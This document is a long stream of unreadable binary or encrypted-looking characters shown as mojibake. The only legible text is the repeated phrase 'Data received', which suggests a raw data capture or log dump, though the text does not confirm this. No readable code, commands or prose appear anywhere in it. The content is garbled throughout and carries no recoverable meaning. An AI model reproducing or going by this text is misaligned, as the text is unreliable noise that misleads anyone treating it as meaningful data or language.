”r ãíM _¬ £ÂU¶ý&5Hj Þ-5éL„Ϊ?z×+b ëïAÿDw‚¼JýŸ½Äè•åÊ2Úâ8±°}2ÑÓ4ù-òOU$}·eöÒ£ñ“_üØN®z¦Os,º/—[ÞÆL±¡§$X­€ùzþ23ä>©æ¶¦Ÿ Þ:ȸ‹š cÉO©=Ê?^ˆ1W¯OQÌ3{¢—˸lÓa¢”AdÖy@4´öHAõð3qD3K ÂÄæ”n¶§±›âÇYo•-ÃS„í®Ø‹©ðó|à5±Ý0铡-K [7túÙ¾[|Öè¼EØæ•ÒE3ôO‚Ž¼˜Qºä£Ç|XÏЌ̩—ù¸BJðu¼uQÆ>5߉ʼ5ÏòªôÙº@/+çb:˜Ö÷K;·ü(îV´,?ôf¤S f±!ªH8wW¨†-/¯= nk杬®0–Ë¡ÚÀ…V·ý×3•d?Sbž—ÚlK¼­8v¾Íqõ¦ã®Õõ/ÖéÆ2ÐÊ_¯ V
Data received µ€öÚ¢šÁz0ܑ1ß3¹Ð:8°e!Ú/,Bõ¢áyÃJšÔŒß%âE_Ìæ¡7KJøÏ ‚œõ(”—š¼k{êm˸)¸ ßüÙ7íª2á`ŒÊV.›ƒmŸuôD0.þÇ6€U•Ø¨ à£»G8t¥Ï§üF€@ŠÖNŽ`šŠØý$ú#èÃòFÒҒŸ/a_ëÉ#çákÅ:øMB4„‰³úW kÖÀlÝw…§ÉSȺ(Ád6si€ö`ŠÞߨ5vÞ!ÅKö«AmÛÏ0E…²kbœS¯éG·³%KH U*®àÁÆöé¸ÁïKÛÅرA.N2N?0g´“Ç2¦%¬=°…^WÇas2)¸’?)²Ç&kØ|í}Y%M“Ø#¹íWuþkæ?A‡3±Ü½Xn¬Ðº•½ôÓZ¯Y¦‡sœó}Ӗ–~ŠtHþ†ížyµ}SªÚkÐúºup6¡Kýª=nÿxÛwO+!£ÇºYïè,ÖBmhŠf)ëû%Ÿ€Þêã·]‰…íø³Ø<äî®ßýÔ¬O’| °_ââà^|‰xÜ,¢ìŽô?Ô…6¼ÉMâcŸºÿ¸É\¥3*¯Ù);–›ìÉoÿ”!2J‰À±—Áw_Úéúځe]71iéÏ]¦g†,é$ãm; É=HÝy…Àï)Åο§h’;s ù0zŠJù³?G“B÷µNt#‚ø ý~ÀÀë8b“!—¼ä'ë"ë¿] ŠQ⟿¾,%‰¾—éÕM.übt8CÏ?×Îx÷V„zÅ¿ÖӞ¿ ê´N[Ó,t0¿$²KÚeà%âæ†ÐÁ¾¿ù+C7„ø…·%HV$OGx¾9m„ªJ#ÃêºÂÓGé‘k‹{Ò4°ðY0ÄK»<<* ) D%‘Ày`›G»V*;é %ÈeÝðÆú‹>dŽÀ“:¾Þ„)é¸ 0·åØ)ÿ ïÉʼ?ÿœè“Ô™«¹‚Ê[c¬°$NLmGg¬í~IF­#*Éu @ÏEɁLgçfa Ÿwú8¡ˆWoB’¾[ŽˆëxÒ #ex€õ;xYus¿"d)SɟµÏ­ÌÌë)¦1¦rp÷ äÁL_þÈzÑÆ¢èZì𚑑˜òRwM»Û&:™<˜!§I2_f¾jÇ]cb¶·9éÔhÚhÄ'mˆ&ã’mynÚ]LáE>hª’©‡íØ5Žº8CØîàfq¥Xê8…Ÿú”ÂU°‰2}&ÅE Í¶#âCi±^½9>4ˆAãL9cˆ˜Ûu©ÔòΟã ýb2ñG|Hxp!Æf<ƒmèO.»¬´Úq«ù…ñŸºÜ…›ld¸Væ€%+Œ·Î–ã‡Åø:PhhÌ)±Ô¼~f7Ö%JgûkÑÎ dŠã1æ§ éç¾e{ž¥ÈézӁár2琛SD¥áôbpla'[Ú iÑGë"ݪú«Äùnûnc™ ¸M<8ièæ/…‚^$¦ØR§o™(wÜ ÀÅ×|¦‰(2îÜò9Þ¾A²¥Ûm\0Ǘ5L7Gn·¦t1ë7ý#«á©³–ˆ¦·¤NU® k?Ñ6‰wn…'fí¼Û̲>çƒßœ$ÁhìD<å•x㪺ž¡[†¼ “>fV£áæû1Š>œ%˜f¤‰CáGvüü‹·¤¹Ð§Òg²¸Æ8ÙXà¥תùúKðr`6¦¸÷JšT;ٟªÓ¯TÎð(ïËìÇ8ðCFiuìŠ3%+s¦`¶1VÿÝ&ßÀyfRè“e­Éô|®×J¿ wQ4 þDÌÛÇÍö’ùxÛt¯Ï>”áÔfÜ0ÏÏÛg¥¶oG†{ÿé‹FÕíȳÊýèö؞9ª‰£Â¾áÀ{wTُ
Data received Ð3ÓèÃ¿$^÷Bü*êC„—#|qû¤x_‹å ô"4ܧžÉ&/Dr–7÷„©l¦4•°ãµnþìcjBuüKdp™i^‰kt£Ib%k¨J·$¤¿¹½^óÓeÖ Ÿ×Àc ®Ø]Yé?èzm ñBsN"käëę¥á<CRšÈÜ5 *ýšÃD‘S^<X“EÁ„,ºyyh唣v \`¥Ù×ÐÔ£¶ÐÛðøíy­—öQAŽ!}l´ gò~\J šr‰Ú@Æk_–(l묹ët“^+GŸPŽˆ×±™¤\Ó÷Š¾†Šÿí±þ—–‰%â06•Ó­ào„º*“áOcr+6TU¼‚± Ù°J1jí3§ŽöK¯ ™Ûb²lÂñ‡'ÂÜn| ±knF”¿¦ù¢ —1¹ 5aŒ?EÆNˆ†‘!`s¯l˜ïnÿ½"aêés ª„5‰îSMžqœ¢çº,nDÔê"A…Ž™CwaŸ&ãÈÍfT%]L—°÷B4®,¬/$á4 ¼j¾µh‘Åßzãß]ýî÷áSvíTrò—ÙsY©'³”f¡‡öoEÜS;'­”a쇲²<L!Iȳ®u@Uiaæîxyi‘¼8j›À@Lw¢ ^­”áúû{3PüJvÙ؎͌1„Vqÿt)%ÝkÉ_å‘ôu„is®Úâž%Q§aw‚†’ÿ_ƾJ[Þ@£8+v ©`¢*€&óK{Ղb‚ØôĄGÍVU‚K|‹ÓÏåj-DGréÉÒ©žµšºC9 Ӟ±8}~~@ÆÛ ä-<ë¢ ‡m·(ñ§Þ¾ !³e=zÈÊMªÄDÀÑ&Þ(ÚÝv5Ø°,î˜ääEòo ºG:ö§UWÆBøÂÁ"N%ã2@,¡Ä׌\\›rÑˬ->ø4è§%ºwûIlXw€›Û‰¶Mô}ɘ1ýbXÀ¿éª?y—`“'ùr…+—R 3™'zR|ܸ‰<w ü]SÿŠü•kmØ<&WVú3ì EhRË<1¼úêY"¡ÔsOLÄJñ{”¯fϱh\ª µÜôÓ(šÚ”MÇuƒ¥bŀ¾˜1¶iE~¢1œR úZµ pž+ì#IÄtËB˜WÇúË~Zô„*?œ%`^Åó~ Óüë·w£ðC(@2'&k¤®Q¸j¾‚•…½±¡¢æ…VþÿÊ®¯Ú"¿ ¾Ÿ® Wî¦L˜%kјÕÐéñ‡ËT}-~âÇ7£èÏÄ% ô¬¢då½Ý€:Uê·zUX h6‹Å_¡‚~)z–ÿ‘Ë\¸Þ2C´I¼¬¬–÷…ÕVqPó >Ïû_ßdÈú¿æ9X¯ÅàÊV«ê‡å¬ŠPìIGŠhŒýã°¸ âc™²'Ô( ƒËE»Q€G™™åƒ¥9¨—O…S쳫 èïéíaÞ|ù¹çˆ²´‹ªe1Ç+Þ­À¶¨Ï ²¸õ¤¸Wa¼wZ¥1"â6q1ØP„óî÷gÄ¢ ]¨©ZÍ»Sy4iߦ<~úz”]ûb6˜ä4§¤Ž_ lš§‰ÛäÎjN¹vî ‡ NŸÿ@Å@K{¸cER)§ª OŠ¿Er®tFd‹gæ‰Ô®åëo¤Ñºk¯¼t”`{aûÙ7'íübýŦ¶Ë†"–A¯|{µMŽZ­ª%rÏߘەvÊ_ DØ̐۹iÖµé3°ìHÙôDP{š˜$§‡M7̞C)œÀ9õœ°=ª“„m1¼B„Âåx Oâ•ã8p¬5ZpZ½ðÌââ|Œ<ns£dK‡gDr2J2b3X#¡ÂÅ<Afñj#Õ"(0Bˎ 'TáÕã?0`€U®ÿÕ‡‡FuÖ&Õ°’ä:"[¿)¬œŸ½"`ÓâÅúa 5×äÀ>×SÝQÕ&0y£Ê)E}ª¢/ËÁVJä B ÂՙìÁÓª¼1Áõ1­ÌöNFä³yX\˜QrrÞ?ÜÜZ‰úk<ôfD²icŠ7Ô©êÖgOÞÓ¥¶Ü6qªVÖhǀ *™§úqä¼9+mÄ׀;EÑßØYY±BÐ:z$Ñr-"Ô|êcÐ`ƍ‚ò¦Ÿ×M4.âÀ­¼éùoöôtešÐ)OA.ŠIú„ä]ŸôGÌ8§‰*ü3CÛ¹!& /¹òïˆtY¼þ°³¥2x‚öÅ= qÁ?×íÉÒYü ϯ°¯àÑJÇ~¢hé(`zÚ(oíÒþ"V’Íi$¿A‰æ¥X½>*A¤½öCÇÕ*Øãå³#½ñ*ÒöàÛª-h›Uϱ·¯²¾Æìù wT]ˆÿ󉈪1ö2nVèñ ›‘§ÐždÈK€ìNÙ7á“+•&±,zoµ‰¨,?fF:ñOô°‚ä?2UØ9¯¿˜±‘–¯kþoJ<»öÀá®$î&t ($øÝ=ÃÔ4\º³ÌUTc˜n{“$m³“õx™é »N¦i1L¢öç#eQôŠRjGâ­&Tóºzõ„³3®šyïàÅĶZrû1E‹Ü‡W°­•˜p'Y=(5 8¦YâæòUg£h5J%Ïï=»{Ü(©xAf¾Œ'ÇÃZl<â«*U&¦uþï ÙÞøÿ®1îqe'ØÏ É}Šì÷v"/ô©UaùB‹€1ÉNBÆAHSÁÃ4¡u"Q!_Bœ®C§³ßiÆ;<°íÙcéj‡{³ ]0¨"?Ôp]> þåJóî•(¡fàaÆ §¿?;(QÀ~ŠÈ_“×Æ=ï-»EÔøTV4ÈQh{^ÊFÍ[$¢n¿¯E`2fdtØl’~\Ÿ*òø×Øïúò„¹ƒdxßÔ,/eâÒ¦b Å¨{¢$Wóý¨•ý™9´ÂMx…g ”­vC©ôÊ|-Ÿ­•QcÔ_Ɨÿg©Ï„?ÍvÝÃ[Nyó6) ç-U9õ•6lÖon½( WÙ´í Ëò=ÚŽ{ á`X…uʯ=á´VD-™‹2ªå¼ >"Ã'{³½ÔùÙbÐzkŸ(bÝsâa‚7ƒo¿û²g¿ÿ<b=ëÖ¶}Ø$sˆ ž³Õ|.‘AöúÜoÊí˜C ÖH5=>vJ´ô-¼|†±áæSGÑ|ie×ÞÃuMo•C½ÐdÇau°™Urux:>‹Î‘>1¼Yñú]×÷q$ÔJ ¼pâqr?ÊRv8|ð–öÚ5 Ñç/=öÝw7É 6+L#Rð!°Í÷AŒ`{#9Æ·†Ëµtx„}àj`y!¥æš_}jtIº‰úäñ+èÄ y åYÉCñµ‹ÍÊ¢Ió |ÕZo1áeLn-÷©oNü©’ô±—ìò@¾ÏÿªºC”÷k‰Í‹~©«òÔ*†§ú#ÅÓ ¡N<}Òñp ˆ\×µ@´ŒÈвº<#'{B7áîIWXš±¨Ñ‚ǂϺºáÛtñIÁ0„×í.-Õð<!šÂ,ñSêãqÁqe6vêË'è=µáUÄތ|‚Q§ˆA_‘[‰UÒ@U®>zᷞ7/•“ K­í#Zé•¥!èw%6îDÐÇð»ëO8 úkæoësÓ[-ðKœþFl¾„' ÿtØAÄý?ŠŽ„ìÎVAÅõÚ!˜ž×l—›ž`ûMå“‹¦l«ü·ô-<6m‰yߛd÷?²»™MµlhÀ𒰔Èú_^–ü9Z]ó$5di&Ç ?»ü@Žú÷f€Èî׀'x$º©O{`
Data received ÌE ><ÿ«û萰5³/]™#Ò%bR'šwí ÑḖgœìBΣºÛ™ße¢UPɘ-M¹à.S[!Ònö”=f§I‹ú×H4^Émtÿ <ø‹Ë2ò½nfì;ž`òƒï—öŎ">£zLJðl‰i]l"OH§UZÜjXQ^Hã9Þ½NÏ÷ ´'>Še¹h¬“'p»önÑ"¶;¾<ßfÚa‹DH²VÀtE?øIìoêfïŠë'‰V+‘µRüTøgÖ*ÖÍ[Tojvù>—§:µÖ„†ÎtC´KýC¦'£N¶¸\´­‡HÆ*¦aàá ¼Ô™ÉÁÞ0‹2£í|µaJ-À1DámڐÌÑéE kH*Õ=ÔØ¥ÿÌ/B˜½Ö\d2®W®%Úl~údÌSß?Áûm©c=þq·¹Ôp!eìÈMç(¬J4AÚitß.K²Ûþ›"wêW ÕBâDõyУ‹Þ+ÙtV¬,–Ó¡¿ÚýƒO±43ð^-Eüÿ¶™ ZÓ=Ù°š›‰ºOÂð×G¼&„$z>h¯Œl(‘|l£KŸÝœà5K%B¤/.ó¦5ÒßV9:M}–v†è›ô0Oä\ê1±Št/x€ß¡[ ðé R‘Þª½¸*7¯~ú7³-ǎ6â TWVPÆÏ3‰¦üº©e€úýŠ‚%–Xß4уm¨ ³Ó£]דw6a¿ÚÍ{ƒ¶±HiÓK,¿vééý`J-<Ô1;‚Û]&‘hošÜãa ðMzÈàB!¥Ëþ)^µQԏÂw‚î~) E×ùÃjÈʑ•@ð[de|žcWÛù uJR‘Óî_%&’Gòx-ќ1_Ýoq5Ê.zîìâCoí™}àä i4±åç<›´\ìiUœ´‹g#›¬¿u²Aƒ £ún`kMpcùäÍ@úg<w#àÛߢdgG∂ß…£ºý“µÁò4K ç :I¾Ùç»j.Gg˜”m¼f@àPöÎùp;QàR©ëoÔR­Sو÷€Št=§Š'9pj×t™¤4¥ù¸2Ÿ“ƒ09pNÍÙ)8A3ÆoŠ' Î7E•lXD%OÍ(AèÐöŠ@˜á®eÛYìÑÍÿ5T)º¡Ý1×óc(ôë"üUƒkٙQ%ßÉÄ'$á~ԆÄÑ2+™šÂÂÞhry=܅•äõÛÁWýb˜¼I.¼rkzX’£'…¹¾O5^†7çU]¬V5?¬¨^Šÿ`¾8<z¶qLŽŠLŽÛ|*W+r„ÚÉ<Cïɺi¥w·†7,Ô?,ãèC=Üó^èëN&?-ÉlŒ LšÙ‰y·„HC] öçŽ%á³(£aªË✺Åx8ƒ€c£èف…`aGÐö\œèŒëá?JvV¼xD«u6$ •Z‰‡ ñßÄ®§kË«]¼ÍÀ€lœ>ðdx‡Á´—“£ˆž„Øôµ1•yÇR‘ã…þë`O÷Ôh9Îê• BíWûÔ4`L'#4õ<±tÁ‚ß𺀬¢ ‹ß Ä m‘“Øíé ¹;à¾Õ›A0.l*·) DÆ$éœBé\i€§Dt@ÙýX®ßöË«(?JÐə*rʉøWÛ°Žºê ߕáôKM~ûóÒ³ðg¥9Ìܚ~»¬5•Í,.›#†&¦Àºœ´z hœçø»ãl'þZÑýA H#fá3b[ƄFla¸NçÊ ï·‘ìÞñ¶Þ:‚*:àð˹I<Ä2ƒÂ´tBгtù x„àB\™EÍùsѕ ×JÈJ$^Ü|\@Šü4_‰Ž`ìzšâFMàÚ-ãRñ}ë!%¶ët9…̶ßøWôIþxͳ®¦ÎΟ£+rù…»2ZÙ}¿&Õ|N¹öËæûÓäŠý´õh°sr×!1Øñ™‘Wv¨X=S^X⢔ý»=n_-§2R!ɟ &T¤e¾²—…=Ã)G›¹ï†öùïU@•ã_'LÕJø¤¤v3ó5—²å±'Ç_]Ún¥Ñ#‘~^˜º5w“È£!;Wð%N}—üÎoÕ§¥ÈÖÙðgb<v„èú òxß;àJýœNh2jåWM%•Úii…ØN«ä)ÌÍø[j°ì­È t¶5V¦¶œ{"ƒwYŠÿðå@Þ4dpçXEý܂SMšB+B6!rí9ºÖDæ`–eTak@–OJ ³øJEAÎÚ'Üö'>²ÚàmU*Ά<79˜YÃ*®:Ôg)f˜öpþ W9lŏ‹T¸1?ÇҀ†¡X}Ó¶k}žRÇ\(oôîq•:! [X¢Ârú*|UÖ ’¢_Ž ýâ&¶R_ú??W*½æ501ZÕº /­*zǸyg|/7m>¥½Ò‘Óç¢R`°ºGS7Q—˜Gol?ZX5ʒ\ïo6Xù@dÏB@ªþ5búë ÞéEììfùö‚EP N'ápwHªZ¨•æŽƒáøz Ù¶ÿä€ dÎõE(_)êSzÇ*¼¯–¿Rðå}+ޒ³ñ4]Döæëò¾s±(ŽOÿKċæÏR^hpå¿Ë×`ƒ E#3λO@,|בŒ›¹Ã)5ZwK·Kc\4ø\Ó?ð-ú«å" –V9Å@ð®VÌ.p¤`6à?=Úöؘ#–@î`™š03£Vºq?¥<WÀ¶fLV<p)©RdѤæ¢<°âf]ú ùæÛêÑp.åÁ v)=dqy,ò.CÓ¤ğÇãH{äˊÅd'}ÊÑF2®Å–ûYÐEâr}D 9‚uÐ."ú”êô¦Á.òøX‘¯7»?çO…Ã[Ý*?rÐzNâÌT/.}l†ÿ2®Ù«Ô¼­Á\#°v'¦Œî»'ðÚÁ^=]¾ž¹4ïb~8‡wž-º±ìd ·ûbz÷BŒ‰‚Ü„<גǕ´[Œp{ 2¢’vO–Y¿äµƒ&ÿî%Fù÷§ãí.²:Ñÿ¹ÁøÁA)ÃÀ'˜§á |‡Ú¨Àš/'&ÍjÃè ±¸n¼4C μó?ÿ.ÁÇòÚCE±õwhWÌöWò„ß0uÅߗUTWµN¨ Uß/6îÄàWRÚz³Nš«œVzdHÙ­94Ü×>F–®;> õìs@u¶šñs|;‚ï®9"ÖÑñµ\Q[oCžax—Æ›à=vf *‰W&1¼)Cd‹§Ê€jöxô󓎐»{Lèû”3bá ^{~KИÖ6àóìӉǾÓG[>ÙR¤ +睜K$òp"û伡6~_¦†5(ŠÓ+~øä.Ø,+ï SN&{ZŸ»|<´„‡àK£dÂ’L±ðó u² š¯iwl ]}ÿaZE5OuÕ(¨n–ô2öÄ£Q÷²q(<Ýó²|cô…Ý•1ÏIü7k1‘üN#¯ÁTQ…ü´jV!X{6=šò&£¥wpžžv¾þ)½£:]O¢X Û¢N[¬·ÓS«:åÝ©¡ §_¸^ßêv”’室Áµ°È°©\ÚtÒïÄ\2@a‡>·’Jî”$´í,¤V\Ý®4højW©Ìc:¤„.!à€†n<ôNìÇì€Zgÿ*·ÝYÒ3S—WNB~"–áƒfîO;fôWmûo£Y»£‡jÁg)Nõ Î\v©ÚEÞ4‰÷¹ K SüÊf|‰†c.Ѽ³óB‘` ¼)!Gß1GÏèÚþKÎÂÏ3<
Data received 7¢Aø¥isŽ«OZ5v³"~~?à 5"üÔôü·G™¸gAä§<î™cåÛüÙÞ ŒË4”éh1%S­`)Ëwô/´ =+¸T®Âk©yø«¨$@¾Ó¾o¿zCkzؘVÛº¹-¶Ý‡Àö¡Ãª—“q9{} Íÿ”êxêå$­ÇɆø´?êð܏@Ѐz˜Û¿ÙÇk·ãMP!05æ‡lèÄ~í­ãb\бïˆ],ܶl¼ºA©‘Ê L G4všQâ;ÖRQÒ Q:ý= ^ꏸÚ~0X(º8&ymÏÆE·¯ýC¡nüî@ÿáP­Â¬Ú„Á+Œ9=áeóíyùŒ—,ÚYÊgtân‡ºí4£LÒÿ§‰poΎ>óÚâ±ùd›ë¤%Ô"O 2M¨uÛÄïS»-ˆRD§÷—öÜݛ¬ê!9ËÚZ¹ïA˜J3hžö”/>.+[Edá\y )^F¶Ã2—_-'Õ«4ª2º[ñDæêÊ¥6‡„%)`ÑÎ¥»¯¬è9‡I^"x¥Æ–௳qNrÄr&ć°3vWµM9X}Xw¥üï?°ã“´6ªB~nüøY¬xüZÅ»àÃ{ò ¿ˆþ(r3[¡Jy6{ýdUoÍÑo©ÌÉB~•Ï‚ÃÂa†`Ú!¡­OⲏDÝç0]â¤Îþޙ=6 à¾ ^NC²¹ŒSv@—çÐßè‡Î¬¨•ïXÒ/d³ßÆ\P¸v„÷|»N†§‹v #0y&ð¹ðø×ãxÔÛ{a!1æñg³·Ì¦Ì™¹›Òœüà\yº*­Å£Ž|ÞÄޜb- OzÄëÔ-ûCqí"³÷-þfv¡{èQt&3*¯¥øµú$'GÈNä×ژL juÝpè·LÖ̃WÄÜ17ñ®6Ñ W nH^\Ò¤°`Ù|©Zïfiñ‰.VÈeԊ’+ð8jܗàò-Žûê°B$¦°ŸÀ£³.à&ÌMæÏÌ·)‹<Çôª®ntÇÛd«[NÃ2M¹þå\T?²Õú›}Ó£^¦ñHK5I-Þz‹T’Ÿ¯G~ØLÓ]p€É#¤,¥|ÑþN™ðÖjìŠ,xXJ£è´çžð±Ï BÖg»özšøÒ²/—«„åPé«çøuj²Sa!œâÙ¯ùN¶¢e&»OŸ ììzè!D³n ‰FHÙgH!V†¼B)Ó÷òb·ðw/5±õ'ßgÁ¦ýaà²ÇbI¥±)KòµÍLÎI›ª#P>èºøl–JïÚރ…yÅúê)«’U¦îÃsAw¾)öd(›Íœ‚b˟–›Î ÈAxÕÏéY·5Ðú“ ¢ñ C&DöX@^íh_†×vÉ1á–<ƒköÜ.yãßu§€{“UÔs‰ðːp;êv¾†=%]i LÓ¿ysµyiUr+ídˆÐÃcÚÄá¡tRFô¨¬Ï3gV,…[Ê1© \À^ë,°Q‹êvÇjò§ì;Ք±ó ùÄþ_(0@:ÓF”ZJRŠÁ’îæ‡lxdì¹Sr¿°zŸòüLvSmÎ8pΜð6|ä~ˆÀ‚:=¡N¼dúƼcÁ™sǐPñº‘x`à)q6ãÏ[>‰a-±Ðò0¯å@R€Ÿã–íxùêŸ4äùT͋¾U§¸dŽÿX¯Cx'8>rD¥7ËWÂE”„(2!¸3ºú»>:ëÖX×>MgQO‹¡ÃîU6´]÷‹ žÈiEsÃMt¤@ÅñWÛ½íSïý–ÙêJc¾ëÕ³©?à­@®âŘ`Àƒ&¿Êjà éºëqy`­a0ö+xàhÚBÈÃWK¼^ïY[ß^h@G2ƒz[å¬êC ®~4mOÈ°·WjþëE×îÇBц啷c]±ŠðÉï€qñéTrÕLò¶ fÎލPËýEät§E¾0€³yÓÄ!]m‡Û//cÂå›mFçmlÝXËÅJ©|«'{_K[˜c /¢LSCC”q¥>¦4°ÀêU¤ 3[ݧ£(œ¿ýP6zJ”Qeñ®f·©ÍZ#ڜuôw”Ћd¦3û¥žA¨Òd1òn ,If´“A(Õ³<¥ 5‡ NœŒ˜Ù«ƒª¨Ëa]¹‡ß»Ûøùq’8ƒ¢Lïòي’çâ5üxk›·ÙᨫÛTÝì€cÀ`c¢°˜aÏbd¶,´tÕ²q1¼<‹—̆÷cÌ~ìL°^ž‰LKçs’çç&‘$cÿ-ÉW‡k*AÏQ>¼… B!ÞõDåhtên.dÃV›rYßL…óJÎ÷Èí»ª3¸23™÷ª $ç´IöiBFL 9Ø7¢+Õv¬ßt€WɁà¿óü2˜oá•oˆÀ· m¨Ìfêø°…›íXî eø{ƒsgaa°=²jµùâ8{·×·¸£*î> )I\ýlË1ËÐpՅ85¤ ‡Ä>ˆ]ŒýOöz˜8'\¼£íܗpÙN<S/v$©½KÙ6°3EÝÀÆ;yª Í]¨Ýu:Ϻ¹wËjÜ©¶¼³ß’e¤¦Ân…ä+,1‹¶à¶ý.Ö%C<’Ë ÓÐttç,|´ÃÙn$™šœVÑ|Ÿ}¯äSڝV`Ö ìh¨-RŽ¿*LU8ò;>àа*‡#$Z·I³l¿åÌdÔÍy°²D8Z×g²¯ m9˜£šÐŸ¢æt{+}^ì¿Ü …*i¯‹À7êΞ“4ôhfÛòçú@R:øŸ³‰·ÄÞ££gF£ÈâˆMl ¤ª âŸ|´rúù žÇd"Ť¨ñùmLéÓ·°[šô¶›ûžª9U©†*âÎNÓ ‰æ£QЛæ3‰DŒÎ§Ì%?g{v-?$±…ÑP 1Û Ñ~Ë ²\`ƒ@ÕÕ()"»[îoxӄždh8˜B0¥¯«ã•tÝÛ¦ÌVÓ[ «| äRq­ãBB¬'¢xŽcwa<Ïfûï.’AL[¬Ró¬évl/Š`©½ÑŸŠÖ’‚Ôsx,=D §Ùˆ]z۴Ԅ:Í3  šF £0,?Ø$–òcÑ;ö£R)Wd×ÈÑhNaO—•¶°‰!¶?±dÚ5¬úgr|ÿ:pŸ¯ŒKþj•†ýš%Ü«ôa4C¾‹ÀXãX¼¢›úý(8**”?HPºäaÑÝ<¼ž¶cVQ’i±À+…Hw_CBõ0 åÖew/7 Ö/ÖZV2eüq¢ë§h57pÙˆãÞN62’ƒ0{ 7Ô,Tªüó'ÁdfÖî/¾§Ý 5Ýôzåȵ.d ¿=e‡°.JlD4¯“j‹üéDèm˜oÏà¸ZÀ8ƒþ¤š¥/NñyäM~šÎÑ⭟­«é%³š3Vt Ñ½Ë_ I­©áK‡\¦Áý–äž ×™K㚆ޕ“”‚­¤1¡Ù.4S°Š`t™äwC‰¾ùFúù@xº<èãr,ÑØÔemÈü§Ûä"¹ÛUj¾Äp_ÂjÁ’fdÿh 0âkf9ÍµÕ ½eŸUdã´ög.iö¡·¿4Œê‘ýÿGœiÖÑ-ñ8•Ñ@êÆþ£¿"+¸¡‰Ý;¿é&GôK,i~´Ç4DÐÜ«è$Õ)l'¶g& ñ9\¡zwF"S× þp]µñljWð}¨I’9žñ[Õ"˜¼Å"¹Ä¯kbø?:Óµ8–NHs9äâ%Ô2¡[l°ôË÷χ 9ے
Data received ¢GY ËñE}\æ/™éûat|~`E_¤·Ý#ð, ñ¨7Ù±´?ǘ I^Mf¬8/”ëË‹ÆÖ'z„Ö$Ðú»ô’ÿÌ´V‘$ð‰¿!pÑZRžÈåé;)±Ü~ˆ{R#œ¢n¤1ˌ ˆŠ­ŠE– aV˜³ê–AÌØUDtS/ñ÷wõºm¹´²µ@ ™sì'v±´â¸ò” a¾Æ]ç[s§«„ ¶@&jPrÝÉ<ªH7iJ{’ý´ë3G~’üD:G ©Ô‹Dž‘ß~ôÍ«£BW@;‘BµkÙþõ·ÐÜ%“»X÷ÔÏØ&Âc3ÕÙÌ.³Ã¯û)¿èÿѶ›¢='‚ð —8Pè=)™:W[÷({N¶àb¡u®0—Ü~B›×‚„²/üÖéG –4M‘H;·¨#ÁêÊo:°Ázxe~ÔQô³õ+ûD˜ß<Pÿ(I¾ÔVÎÖÔbv/ޛæŽÕ÷ôt‘?Æ: ­Êãf¢™ôð­Ö—:¢}’Ç´¶³\S·ß”ygä˜à=¤ã¾iøÏ@t)Љ¬‚tÑVï?JÆò6Þ@IE¯5WjΦ¥'[K|@mËMvÞ"àŒ%·˜ ϓ)ç~ÈHLÓè]ÑÑ;ÎDQvîu(Me:[Pé "kjí8[âÍő¼-‹A5Õ¥GÃù–ÎÅ**¡ÎT̸±jæäŸá7’‰"'’Óÿ çöÖõ¯ÑÄëvA±¦öˆøäkQð©9ZPâ°ÛóÊò–òO8î(´&¿‹ãä®PŒ/j‚¨µ?”0æ÷BôNÕÆ̖{ÌçÝùŽí»xi磸°<šÛ[cøgdþ5*µæWÆËߪ´Âñx5Õ³ ®N L(RïØÍ`;cPS=ݧ a䌉áw$ôÀm¯ýà!æ超•ˆÅU\Ê®ïÒ¨Pý¼ÆC ž·q{ÇQ·Ê¸XGu踤¯Fçÿ2#y•çªæœ€[^!ÿvË䜬¶G'ؓ²¯ Hׂ* Jüû巇 i`4j Ö³2Bè"…øéGϏÆ0U<A>†U¬·^A­Ë…"8þAŠÇСƒ†%Ô´ÚW)ёgû hDÏÞµó©o23 ì=¥²cD¯ÜLpN Ðã-[ñ1ÿêÚÊD'€û;Õßʪ`•nsn”7Vå7´Ìì†1åäßۘ”>È\Ƕv2ámÃmJ3I¡TA4ݪʪ wˆ»è…Ì«” xXÖ%—Xyp>÷éiâÄŸ±ØâÔÝ匤ƒéô+‹Þ£uEŠcg3Œå÷nŽ:É+ׄÌr9 ZNýoúõ]ñ3Õ΄€ÈÃâS^ʯWA;M}i›ô1B ièwõ6&ýÁÏ®“Ǐ2”{ ïõ6M0=õÍ«M,L~èÍ“ïªKÓ|7_Þä†þØ£àBà˜Q—°~/Ðߝü\tCÜÇN)?›Q^`>žeÉOÛÚô¥ñö†ñ:ŠNzšK÷ß×kñÿô[ZÙDŠâN³¤ä®bo—t¸ÆІdÊGŠ­¯ÚLu¢•:Ù=DUSq:ÈÃØ~øfn™x?wiB©à_s³1SjžLü­ÎÚ=Ñ¥À”–ë3ºvÆ5ö/h%Ø—'^ú‘É›A¨Ò@ŠD P:¦>‰B­_©.ݙFO³ïœ¨CYÒkUùWnM¡ 'Á9T¸>(x$Ft¦[54Ž³›sìü…À€ÿ%v®Vd/(EæýU™«j¨ÆI A¹ª‡ø^©Mä%‹©^…þ #Hå2EM~ûþhoÃæúµî£òàgÈϒ“†» t°fzT÷Y`„͸i€}A&w×&[ͶMrB‰‡ÁiÃ>A5ÙË[ׂ҃©L?>–£ÉÔ@8‡‹²ŒÏvÜÝ÷Ì&{v¦2*ݙs‰Pv”Z~Ýò¼—Õ±á—!üjK¹ìQŊLè‘vv:ç·«ãÚ5²!ÍYºÂŒ<‹G«$ËZŽô’ƒ4ΨPò”Êúƾ´CGœÂ,ƽÇò®à€<©Ÿh!'ú&÷‹ø‹Nz­ØEÉúÑ'¸îé<Ú¯»ÿC`K^ƒýnY¡Œdf¾f"`7¸á›¡’ ­éR?mÉ4•ò¼Õց›5¤x’Æìh[“`(©÷,óH¦´dKS§m$ˈù÷&÷ì4̊Э®Hs0ö‹P]öœP샣åc8°µÀÉú§çkWçÍLQ¢¥¯—v‘+*æÂÙ¾FSN{V6úÌvMú]Ûo+{6¸Ôþƒ4¬òؑ»³»HzÄXU"NöXÝÂì@b³¯ˆWºw¼A=÷¿òÒ-ü¦+.v9Gà{fS‡ãN‚Y1ŠY.6ß #O<¬+\ßC!äç\ʗ2¯öû1.ÔA&PNŸÅ‡ÄêûÀå ƒ•Ææ|½SÊÚ-øŸ¨ä7x4y@óFt6HôéE*¢=ìڟ’‘†=@Hß9Ï5ńzNù„55ÔIh@†U‡)¦90R®›å@ÃëóÓ2H5ƒ73ûÐ'›W²¼ù-œ¹jº²zÁiG æÊ4öX0j ¤"˜ÉŽh®5ß[6Ä]ta)¾¿N†ø¼Ê›w.aŸIüB l¢õ~¢gà L¨dºÓäeG‡¿ÛA±Î Ô¦UsdJËؔmJKJû=Ó 7_nÿ2*´*‘ö3¨fÇX”¼9!x« ?Ïɒϛø/£>sƒ±/ß+ìdaÑἁƒK€öòJÄ 